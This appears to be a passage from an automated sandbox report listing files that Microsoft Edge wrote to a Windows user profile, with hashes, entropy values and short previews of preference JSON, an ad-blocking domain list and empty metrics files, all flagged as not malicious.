Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9be7a1e9-0d49-4c51-ba16-9fbc9bda8734.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45941
Entropy (8bit):	6.086792686124369
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQgx95RYRuNhDO6vP6ONl11PqvLiPyP2185CAo0Goup1Xl3jVzX+:mMk1rT8HR95RI6tlqP2185Ro0hu3VlX+
MD5:	4A21D34817F0D013038A44C1EA6A8978
SHA1:	E92BDA39F900FF3028405C288D2D8ED14AC35963
SHA-256:	3BB3BEDAB904445883AE6ED67F657E732BB4E09421D3939E44DB7EB269584C4C
SHA-512:	98E94E3AC814F5D215BAD84142916339B0883C35F95F1B06A81AEAE450C297D6418D7344B5E04981D2DC13CCD65085A3EF848619942C25A706C765F58AB38BEE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132142787195
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P75:fwUQC5VwBIiElEd2K57P75
MD5:	8A8D1DEF9454FAD85BE45955088388B3
SHA1:	DAC7F47706D3DCEDBCE567536B51BE314DC5FD33
SHA-256:	740558A371E809FCF6F4EB7F5DCA3F2766E27FCAD5E4DA04D13A181760E16312
SHA-512:	8D2A8819C57B74037422D8B725B5A061C728CB3B66C14ACB1955A2AB0E03403403B1692595CE3EBB488EFB7685C88CDAE3CD7890344353E2EFB3E5496D670EB5
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\f5b08ad3-3972-4a30-ad0a-c64805b71a28.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132142787195
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P75:fwUQC5VwBIiElEd2K57P75
MD5:	8A8D1DEF9454FAD85BE45955088388B3
SHA1:	DAC7F47706D3DCEDBCE567536B51BE314DC5FD33
SHA-256:	740558A371E809FCF6F4EB7F5DCA3F2766E27FCAD5E4DA04D13A181760E16312
SHA-512:	8D2A8819C57B74037422D8B725B5A061C728CB3B66C14ACB1955A2AB0E03403403B1692595CE3EBB488EFB7685C88CDAE3CD7890344353E2EFB3E5496D670EB5
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67350078-1DF4.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.5381269247518402
Encrypted:	false
SSDEEP:	6144:5YcIfUakOkct/ACHZWqP8S2PTqzaH6Vm6:mkctAWO
MD5:	F8A9CA1F3C6E4F6DBED5BF824805E765
SHA1:	19B811806F2828D4197AEB25559577BEDE0FE860
SHA-256:	7ED6EC14BFD46BEA70619C6AE7091E60F165DC7EE3C16EBBEC5DD22E06EDED0E
SHA-512:	E948D33FF234ED7827B2CBD5B9ED27E6CF4584C819B62C671C359887FED4A67DA794B4F1D45406DAE8FA70E28769347B0BCD7EBB4CB46D07B47D4A7ECD07DE2C
Malicious:	false
Preview:	...@..@...@.....C.].....@...................0...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".pdcbxh20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........~...... .2.......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\027dd3bf-ef6a-4536-92fd-9936d68d7151.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (17392), with no line terminators
Category:	dropped
Size (bytes):	17392
Entropy (8bit):	5.475584416185762
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms6ifhUrKmOhvk64bGxQwY6WilaTYT:sPOXuFifabGiDgaTYT
MD5:	E00EEAE83BEFAF1986D66541CB5B32E0
SHA1:	07EB093DDB9EDA7928649121F161BCA7DB6FA953
SHA-256:	93AD4FC65EE6A74E9090FEBA9BD2513275D5D7F8D834D11C572D03FE39117C63
SHA-512:	D9641E385E81D6C1D93F10270CE2D4CC3E2630EC98E9E27E884038F86EE4743C8AF4C256A087CAF462EC7798A3F71D107B970B607C37CFF27A6EE9D5A56E91E2
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0dbf3738-3315-4b5d-bfe3-4d2fa616f381.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (17484), with no line terminators
Category:	dropped
Size (bytes):	17484
Entropy (8bit):	5.473367810086705
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms0ifhUrKmOhvk64bGxQwY6WKlaTYU:sPOXujifabGiD4aTYU
MD5:	57171597F1C9D4C0763A8DC9C8E34988
SHA1:	54495F182F72A12BAE704B84168C8569F61F4EC6
SHA-256:	42ADA14F386D3EB8D63285387233A505B673F05323C676A33A0F325A989068A1
SHA-512:	BB80CD5190F2D8F54473BD8A75645733650C744FA7D9FBD52FEB73DE771F243A0E03C7C6FF325795F000BEDBCC635F9E3DB4C41D46DEAC19185D032FE264F038
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\124cc043-a044-4e1a-bfdf-98265a7a54e4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	38626
Entropy (8bit):	5.554873169793035
Encrypted:	false
SSDEEP:	768:pCt2Yv7pLGLp7JWPU6fZu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVhb4pbrwzvOw1qG:pCt2Ypcp7JWPU6fZuu1jaoEpwzvOwk1k
MD5:	AC851C8ACE81FEEA0D0BE6464F253772
SHA1:	A7822986DFD9D519E134082439D16D347FB43AD0
SHA-256:	63DB97FFC43BE084F2F196951B9B823FC3C558F4D95D9FAACB701BCC67F36D12
SHA-512:	B1928C37FF63525D6850C03D0899F831E3E32460B68EE2E7600B302FBA9EF556F2336DA1DB2D6DB48D976042A113943AD00B3AAA68A49C87DF7A0BB0C3E57B09
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376000376727965","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376000376727965","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\20ee841b-2c02-4945-acd5-ddd41d78a064.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (17227), with no line terminators
Category:	dropped
Size (bytes):	17227
Entropy (8bit):	5.4789934106500064
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms6ifhUrKmOhvk64bGxQwY6WMaTYT:sPOXuFifabGiDgaTYT
MD5:	A110282A1674EFF759D0702F182A8B70
SHA1:	FA3892F24CF3D6E8B9956AD1E5EBAD6614C3C6B3
SHA-256:	046C74CAFFB6EB4E89E1627469D78034AC014AD2755F429FF5A5D552A221E419
SHA-512:	32E690FAA1D3E0569245857B35B3028B3C5F0D491B3E9B609C50F100D8310D13A57FC32657CA8873F4CCA2C859672E9ED66F69C27523CAD83700A042313CC164
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\22ed3d9e-998e-4ac8-b533-560ae1a959d9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3ef690b1-f1a9-4bc2-b0bd-f390d839b656.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (17436), with no line terminators
Category:	dropped
Size (bytes):	17436
Entropy (8bit):	5.473840946677106
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms0ifhUrKmOhvk64bGxQwY6WKlaTYT:sPOXujifabGiD4aTYT
MD5:	236334025CA9A511CB640814ED3CF196
SHA1:	0055703A24E882146104356B85001B57A7FD5AD5
SHA-256:	AE90DB913AD5095ABE909543395A353B464E67E6257340D3E6D28A15ACC1813A
SHA-512:	36E87A8F6097A060B007D53D1111378DB3CBF1C904483754F84C688402080E93DB0877F15CB91C00BF72048E7D0D0DE78886443F79D52445F961F532D175722E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\41b98de4-da0e-4e68-b154-15fa72c300ee.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (17392), with no line terminators
Category:	dropped
Size (bytes):	17392
Entropy (8bit):	5.475509390046141
Encrypted:	false
SSDEEP:	384:stxPGQSu4Ms6ifhUrKmOhvk64bGxQwY6WKlaTYT:sPOXuFifabGiD4aTYT
MD5:	97FAD492995B1A6EB1BD89E9B71C6FA6
SHA1:	6404A2BDC0ED630B7AA67F800A5457B82DC39496
SHA-256:	BA6384F6E5997F49DE95EED8C0D0C9E9D3C3CBD71C7F90D812662D2B569D38C6
SHA-512:	0033FEE0507B620E3BEE749F6BF328E0222B3963CD5C7AB02052FBE8857BAD847CEF57DF52768B07D5A0C506E50E5D18571740EE5E83B97B429DC4BA5A03B2EB
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4cb46005-19c3-4a5f-8b39-6438bb7b7ac1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12489
Entropy (8bit):	5.202726220175894
Encrypted:	false
SSDEEP:	192:stxJ99QTryDigabatSuypMs6isZihUkoqww8FbV+Fj9QA66WWaFIMYVP0YJ:stxPGKSu4Ms6ifhCbGxQx6WWaTYT
MD5:	842B55834184556F4987C8DC4A56B7FA
SHA1:	025A654C62FE9D4FFA86F62A9EB657B3F08F61F4
SHA-256:	F25663269E65611A99C26B9E93C56C4E0F28BE42B95525F85B4B7AC4C45BE8FE
SHA-512:	9C069E90A4736F5987FD582132ED96715EFA5BE82C7D62D2116F9A7F2CBB3FA5088C004011476D1243661B39D1C9E74DD0833BEE7F9F40B6004CC7F36023A31A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376000377231072","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
